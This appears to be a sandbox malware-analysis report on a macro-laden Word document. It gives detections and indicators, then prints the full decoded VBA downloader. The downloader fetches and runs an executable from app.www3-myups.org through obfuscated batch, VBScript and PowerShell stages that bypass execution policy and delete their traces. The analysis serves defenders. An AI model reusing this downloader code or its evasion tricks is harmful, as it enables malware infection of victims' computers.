MALICIOUS
314
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with AutoOpen and GetObject calls, indicative of a downloader. The script attempts to construct a path and download a file from the URL http://app.www3-myups.org/officess.exe. This behavior is consistent with a macro-based downloader designed to fetch and execute a second-stage payload.
Heuristics 12
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell(b, 0) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject _ -
Payload URL assembled from a Chr()/Asc() string expression (3 URLs) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Environ(a) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://app.www3-myups.org/officess.exe Referenced by macro
- http://savepic.su/5472937.pngReferenced by macro
- http://savepic.su/5479081.pngReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20055 bytes |
SHA-256: 93cdd183048e32578441e6757ac6ee5dd3ea7f932d49cc422589f5c21d6a6910 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
h
End Sub
Sub h()
SKLDL = "j21kh3 jk12h3kj12h 3kj12h3 k1h21k3"
KSODW = Chr(Asc("d")) & "-" & Chr(Asc("u")) & Chr(Asc("p")) + Chr(Asc("d")) & "at" & Chr(Asc("e"))
LSJADKJSA = "asdjsalk jdkjsalasdwq8hq wk"
ASLDLSJADKJSA = "asdjsalwqdqwq jdkjsalasdwq8hq wk"
SDWLSJADKJSA = "asqwdqwdjsalk jdkjsalasdwq8hq wk"
BART212 = KSODW
JFIEDDD = Chr(Asc("c")) & ":\" & Chr(Asc("W")) & "i" & Chr(Asc(Chr(105 + 5))) & "do" & Chr(Asc("w")) & "s\" & Chr(Asc("T")) & "e" & Chr(Asc("m")) & "p\"
JDUIWAAA = Chr(Asc("c")) & "" & ":" & "\" & Chr(Asc(Chr(70 + 10 + 5))) & "s" & "e" & Chr(Asc(Chr(110 + 4))) & "s" & Chr(Asc("\"))
MDKWWW = "\" & Chr(Asc("A")) & "pp" & Chr(Asc("D")) & "ata\" & Chr(Asc("L")) & "ocal\" & Chr(Asc("T")) & "emp\"
JISKKK = Chr(97) + Chr(100) + "o" & Chr(Asc("b")) & "ea" & Chr(Asc("c")) + BART212
VBT2 = JISKKK
VBTXP2 = Chr(97) & Chr(100) & Chr(Asc("o")) & "be" + Chr(Asc("a")) & "c" & BART212 + Chr(Asc("x")) & Chr(Asc("p"))
HYDW = "" & Chr(Asc("a")) & Chr(Asc("d"))
BART2 = HYDW & "" & Chr(Asc("o")) & "b" & Chr(Asc("e")) & "ac" & BART212
PST2 = VBT2
HUEFQ = "" + Module4.Plain("" & Chr(Asc("u")) & "" & Chr(Asc("s")) & "er" + Chr(110) & "a" + Chr(109) + Chr(101) & "")
PST1 = "" + PST2 + "." + Chr(Asc("p")) + Chr(100 + 15) + "1" + ""
VBT1 = "" + VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
STT = "" + "44" + "4." + "pn" + "g" + ""
hjife = 51 + 50 + Sgn(-6)
kktd = hjife
BART = BART2 + Chr(Abs(kktd - 50 - 50 - 45 - Sgn(5))) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(Abs(kktd - 100 - 15 - 1)))) + ""
KJASKDJ = "kj23 k4j3k2jlk23j 4kl32j4 kh3 4jk23g 4hj23gfh gh2f 4hfg234hfg 23hgfg4f4 hg2f 4hg23f 4gh23f4h23f4 h23gf 4h23"
'JSIQOJQ = ""
JSIQOJQ = Chr(Abs(kktd - Sqr(4) - 100 - 44)) + Chr(Abs(kktd - 100 - 97 - Module3.Signing(15))) + Chr(Asc(Chr(Abs(kktd / 2 + Sqr(4) + 44 + Sgn(Sqr(16)))))) + Chr(Asc(Chr(kktd + Fix(16.2))))
KJHDU = BART2 + JSIQOJQ
KIOAJD = KJHDU
BART = KIOAJD
JIDWQQQ = JDUIWAAA + HUEFQ + MDKWWW
MY_FILENDIR = JIDWQQQ & PST1
STAT = JIDWQQQ & STT
ASDASDSA = JIDWQQQ & BART
MY_FILDIR = JIDWQQQ & VBT1
XPFILEDIR = ""
HJUTTT = VBTXP
XPFILEDIR = "" + JFIEDDD + HJUTTT
UHFD = "" & JFIEDDD
TRT = UHFD + BART
KRT = TRT
HYF = KRT
KJSAHDFFFJ = MY_FILDIR
Dim Kjqiwdj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
Dim Uuwqdhj As Integer
Dim retVal As Variant
FileNumber = FreeFile
FileNumb = FreeFile
FileNu = FreeFile
FileNukk = FreeFile
FileNs = FreeFile
Kasdwq = FreeFile
FileNuG = FreeFile
Dim objWMIService As Variant
Dim colOperatingSystems As Variant
Dim objOperatingSystem As Variant
Set objWMIService = GetObject _
("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem" & "")
For Each objOperatingSystem In colOperatingSystems
CJIS = objOperatingSystem.Version
SysReport = SysReport & "The operating system on this computer is " & _
objOperatingSystem.Caption & _
" (" & CJIS & Chr(Asc(")")) & ""
Next
Set objWMIService = GetObject _
("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ys" & "tem" & "")
For Each objOperatingSystem In colOperatingSystems
winverstr = objOperatingSystem.Version
Next
winver = Module3.Vava(winverstr)
WaitFor (1)
jskw = winver
URLLSK = "app.www3-myups.org/officess"
STAA = "sa" & "vepic.su/5472937"
STAB = "sa" & "vepic.su/5479081"
' UWGD = XPFILEDIR
' If (Len(Dir(MY_FILENDIR)) <> 0) Then
' SetAttr MY_FILENDIR, vbNormal
' Kill MY_FILENDIR
' End If
' If (Dir(ASDASDSA) <> "") Then
' SetAttr ASDASDSA, vbNormal
' Kill ASDASDSA
' End If
' If (Dir(MY_FILDIR) <> "") Then
' SetAttr MY_FILDIR, vbNormal
' Kill KJSAHDFFFJ
' End If
' If (Dir(STAT) <> "") Then
' SetAttr STAT, vbNormal
' Kill STAT
' End If
' If (Dir(UWGD) <> "") Then
' SetAttr UWGD, vbNormal
' Kill UWGD
' End If
If (jskw <= 5.5) Then
'NUWHDGJS = UHFD + "euifhszdf.jfi"
'Open NUWHDGJS For Output As #Kasdwq
'Close #Kasdwq
NUWHDGJS = HYF
Open NUWHDGJS For Output As #Kasdwq
Print #Kasdwq, ""
Print #Kasdwq, "" & Chr(Asc("@")) & "e" & "ch" & "o of" & "f" & ""
Print #Kasdwq, "" & ":" & "p" & "in" & "ka" & "tor" & ""
Print #Kasdwq, Chr(112) & "in" + "g 1.2.3.1 -n" & " 2" + ""
Print #Kasdwq, "set ggtt=" & Chr(34) & "bs" & Chr(34)
UHADKASJDWQD = "jkh32jkh2 jk4h2kj 4h3k2j4h jk23l4h 23"
Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\W" + "indows\T" + "emp" + "\" + VBTXP2 + ".v" + Chr(34) + "%ggtt%"
Print #Kasdwq, Chr(112) & "in" + "g 2.2.1.1 -n" & " 2" + ""
Print #Kasdwq, "" & ":windows"
Print #Kasdwq, ""
Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc(Chr(Asc("e")))) + Chr(Asc("x")) + Chr(Asc("e"))
Print #Kasdwq, ":loop"
Print #Kasdwq, Chr(112) & "in" + "g " + "1.3.1.2 -n" & _
" 1"
Print #Kasdwq, "set tar1=" + Chr(34) + BART + Chr(30 + 3 + 1)
Print #Kasdwq, "set stat=" + Chr(34) + STT + Chr(33 + 1)
Print #Kasdwq, "del " + Chr(34) + "c:\W" & "indows\" & "Tem" & "p\" + VBTXP2 + ".v" + Chr(34) + "%ggtt%"
Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "" + "%ta" + "r1%" + "" & ""
Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "" + "%s" + "tat%" + "" & ""
Print #Kasdwq, "if " + "exist " + Chr(34) & "" & "c" & ":" & "\W" + "in" & "dows" & "\T" + "emp" & "\" + Chr(34) + "%tar1%" + " goto loop" + ""
Print #Kasdwq, "" + "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "e" & "mp\" + "" & "" + VBTXP + Chr(34) + " g" + "ot" + "o lo" + "op" + ""
Print #Kasdwq, "exit"
Close #Kasdwq
WaitFor (2)
mttt = 88
Open XPFILEDIR For Output As #FileNumber
Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + "" & Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)
Print #FileNumber, "" + "jfeuygq = " + Chr(34) + "4.e" + Chr(34) + "+" + Chr(34) + "xe" + Chr(34)
Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + Chr(34) + "+" + "jfeuygq"
Print #FileNumber, "frgea =" + Chr(34) + "M" + Chr(34) + "+" + Chr(34) + "SX" + Chr(34) + "+" + Chr(34) + "ML2.X" + Chr(34) + "+" + Chr(34) + "MLH" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + "Chr(80)"
Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(frgea)" + ""
Print #FileNumber, "Set mkH = C" + "reate" + Chr(Asc("O")) + "bject(frgea)"
Print #FileNumber, "" + "" & "objXM" & "LH" & "T" & "TP.op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", strRT, False"
Print #FileNumber, "mkH" & ".op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", statRT, False" + ""
JASHDJK = "send()"
Print #FileNumber, "objXMLHTTP." + JASHDJK + " "
Print #FileNumber, "mkH." + JASHDJK + " "
Print #FileNumber, "" & "If objXMLHTTP.Status = 200 Then" + "" & ""
Print #FileNumber, "uwqhda = " + Chr(34) + "ADODB." + Chr(34)
Print #FileNumber, "" + "Set objADOStream = C" + "reateO" + "bject(uwqhda+Chr(Sgn(-4)+84)+" + Chr(34) + "tream" + Chr(34) + ")"
Print #FileNumber, "" + "ob" + "jA" + "DOSt" + "ream.O" + "pen " + ""
Print #FileNumber, "" & "objADOStream.Type = 1"
Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
Print #FileNumber, "objADOStream.Position = 0 "
Print #FileNumber, "objADOStream.S" & "aveToF" & "ile st" & "rT" & "ecation " + ""
Print #FileNumber, "objADOStream.Close "
Print #FileNumber, "Set objADOStream = Nothing "
Print #FileNumber, "E" & "nd if " & ""
Print #FileNumber, "" + "Set objXMLHTTP = Nothing"
Print #FileNumber, "Set objS" + "hell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "" & Chr(Asc("S")) & "" + "cr" & "ipt" & "." + "S" + "hell" + Chr(34) + ")" + ""
Print #FileNumber, ""
Close #FileNumber
WaitFor (1)
ASKJD = TRT
NUS = Module3.Trance(retVal, ASKJD)
End If
If (winver > 5.5) Then
Open MY_FILENDIR For Output As #FileNumber
Print #FileNumber, "" & "$do" & "wn = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
Print #FileNumber, "" & "$stat = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(116))) & "" + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://" + STAB & "" & ".p" & "n" + "g';"
HUHHUUHUHUHUHUKMK = "6ht76 7tftf t7f 7f yfk ftyf6f tu ftyf "
Print #FileNumber, "$gg" + "tt = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(116))) & "" + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://" + URLLSK & "" & "." & "" & "e" & "x" + "e';"
Print #FileNumber, "" & "$fi" & "le = 'c:\Users\" + HUEFQ + "\Ap" + "pDa" & "ta" & "\Lo" + "cal\T" & "e" + "mp\" + "4" & "44." + Chr(101) & "x" & "e';" + ""
Print #FileNumber, "$statfile = 'c:\Users\" + HUEFQ + "\AppData\Local\Temp\" + "4" & "44." + "j" & "pg';"
Print #FileNumber, "" & "" & "" & "" & "$do" & "wn.hea" & "ders[" + Chr(39) + "User-Agent" + Chr(39) + "] = " + Chr(39) + Chr(39) + "+" + "'Mozilla/5.0 (Ma" & "cintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25'" + "+''" + "" + ";"
Print #FileNumber, "$dasdw='123';"
Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($gg" & "tt,$" & "file);"
Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($s" & "tat,$" & "statfile);"
Print #FileNumber, "$asdw='123';"
Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
Print #FileNumber, "$noneFilePath = 'c:\Users\" + HUEFQ + "\App" & "Data\Lo" & "cal\Te" & "mp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
JIUSD = "ad" & "obe'+'acd-up" & "date"
Print #FileNumber, "$vbsFilePath = 'c:\Users\" + HUEFQ + "" & "\" & "A" & Chr(Asc("p")) & "pData\Lo" & "cal\Te" & "mp\" + JIUSD + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + "+" + Chr(39) + Chr(39) + ";"
Print #FileNumber, "$statFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + "444" + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "j" + Chr(39) + Chr(43) + Chr(39) + "pg" + Chr(39) + ";"
Print #FileNumber, "$b" + "tFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + JIUSD + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + JIUSD + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s" + Chr(39) + "+" + Chr(39) + "1" + Chr(39) + ";"
Print #FileNumber, "St" & "art-Sleep -s 15;"
Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + HUEFQ + "\App" & "Data\Lo" & "cal\T" & "emp" + "\444.e" & Chr(120) & "e'; "
Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
Print #FileNumber, "$file2 = gci $" + "b" + "t" + "FilePath -Force"
Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
Print #FileNumber, "$kasldds = $vbsFilePath"
Print #FileNumber, "" + "If (Test-Path $kasldds){ Remove-Item $kasldds }"
Print #FileNumber, "" + "If (Test-Path $b" + "tFileP" + "ath){ Remove-Item $b" + "tFileP" + "ath }" + ""
Print #FileNumber, "" + "If (Test-Path $s" + "tatFileP" + "ath){ Remove-Item $st" + "atFileP" + "ath }" + ""
Print #FileNumber, "" + "$jsdhyfueh2hds = 'asdghyg23d jashdhsagdhasghdhgas';" + ""
Print #FileNumber, "" + "If (Test-Path $no" + "neFi" + "leP" + "ath){ Remove-Item $n" + "oneFi" + "lePa" + "th }" + ""
Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
Close #FileNumber
KJUCBHS = " = "
Open MY_FILDIR For Output As #FileNumb
Print #FileNumb, "Dim dff"
Print #FileNumb, "dff = 68"
Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & "&" & Chr(34) & "S" & Chr(34) & Chr(38) & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) + "&" + Chr(34) + Chr(34) & ")"
KJSUWD = Chr(34) + "&" + Chr(34) + "ad" + "obe" + "acd-up" + "date"
Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + HUEFQ + "\AppData\Local\Temp" + "\" + KJSUWD + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s" + Chr(34) + "&" + Chr(34) + "1" + Chr(34)
Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "he" + Chr(Asc("l")) + Chr(Asc("l")) + KJUCBHS & Chr(Sgn(-4) + 68) + "reate" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + ""
Print #FileNumb, "" + "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " + Chr(34) + Chr(34) + "+" & Chr(34) & "p" & Chr(111) & "w" + Chr(34) + "+" + Chr(34); "er" & Chr(83) + Chr(34) + "+" + Chr(34) + Chr(34) + "+" + Chr(34) + Chr(34) + "+" + Chr(34) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true" + "" & ""
Print #FileNumb, ""
Close #FileNumb
KSDOW = ASDASDSA
Open KSDOW For Output As #FileNs
Print #FileNs, "@echo off"
Print #FileNs, "pi" + "ng 1.1.2.2 -n" & " 2"
Print #FileNs, "chcp 1251"
Print #FileNs, ":asdqwqdw"
Print #FileNs, "set Gds1=" + Chr(34) + "." + Chr(34)
Print #FileNs, "set Gds2=" + Chr(34) + "v" + Chr(34)
Print #FileNs, "set Gds3=" + Chr(34) + "bs" + Chr(34)
Print #FileNs, "set Ads3=" + Chr(34) + "adobeacd" + Chr(34)
Print #FileNs, "set Ads4=" + Chr(34) + "-up" & "date" + Chr(34)
Print #FileNs, "set Gds4=" + Chr(34) & "c:\Users\" + HUEFQ + "\AppData\Local\Temp" + "\" + "" + Chr(34) + "%Ads3%" + "%Ads4%"
Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & "%Gds4%" + "%Gds1%%Gds2%%Gds3%"
Print #FileNs, "exit"
Close #FileNs
SetAttr MY_FILENDIR, vbNormal
SetAttr ASDASDSA, vbNormal
SetAttr MY_FILDIR, vbNormal
WaitFor (1)
LJSUIAJHDKQ = ASDASDSA
NUS = Module3.Trance(retVal, LJSUIAJHDKQ)
End If
Module1.findTest
Module3.secondTest
Module1.abdklw
End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Module3"
Public Function Trance(a As Variant, b)
a = _
Shell(b, 0)
Trance = a
End Function
Public Function Signing(a As Integer)
Signing = Sgn(a)
End Function
Public Function Vava(a)
Vava = Val(a)
End Function
Sub secondTest()
Dim firstTerm As String
Dim aFerm As String
Dim myRanget As Range
Dim yytt As Range
Dim selRanget As Range
Dim selectedTextt As String
KISDQ = "in" & "bo" + "x>"
Set yytt = ActiveDocument.Range
firstTerm = "<" + KISDQ
aFerm = "</" + KISDQ
With yytt.Find
.Text = firstTerm
.MatchWholeWord = True ' MatchWholeWord
LAJSDHUW = ".MatchWholeWord askj das"
'jklasjdklsajdiqow
.Execute
yytt.Collapse direction:=wdCollapseEnd
Set selRanget = ActiveDocument.Range
selRanget.Start = yytt.End
'sdfiwelfjwilefjew
'asdkext = askld;sadka
.Text = _
aFerm ' KJSLADIW dsad sa
'KJKLhdaskd asd
.MatchWholeWord = True
'jeoifwjflsdfs
'.Executed
EXECUTEFDDD = "j jkh12jh3 kj2 1jkhlasljkdklj kj kl1h23j "
.Execute
yytt.Collapse direction:=wdCollapseStart
selRanget.End = yytt.Start
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub
Attribute VB_Name = "Module4"
Public Function Plain(a As String)
Plain = _
Environ(a)
End Function
Attribute VB_Name = "Module1"
Sub findTest()
Dim firstTerm, secondTerm, selectedText As String
Dim hhhg, selRange As Range
Set hhhg = ActiveDocument.Range
JIS = Chr(Asc(Chr(60)))
SKDW = "" & "select>"
DSQQ = JIS + SKDW
ASQQ = JIS + "/" + SKDW
firstTerm = "" & DSQQ
secondTerm = "" & ASQQ
WITHrtas = "Find"
With hhhg.Find
.Text = firstTerm
.MatchWholeWord = True
'ashdkjqhdkjqwhdjk
.Execute
EXECUTEFD = "lakjsd"
hhhg.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = hhhg.End
.Text = secondTerm
.MatchWholeWord = True
'kashdjkashdkjashdjksh
'.Executed
EXECUTEFDDD = "j jkh12jh3 kj2 1jkhlasljkdklj kj kl1h23j "
.Execute
'.asdsa
hhhg.Collapse direction:=wdCollapseStart
selRange.End = hhhg.Start
selectedText = selRange.Delete
End With
End Sub
Sub abdklw()
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "" & "<" & "sel" & "ect>" & ""
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "" & "</s" & "ele" & "ct>" & ""
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "" & "<" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "" & "</" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.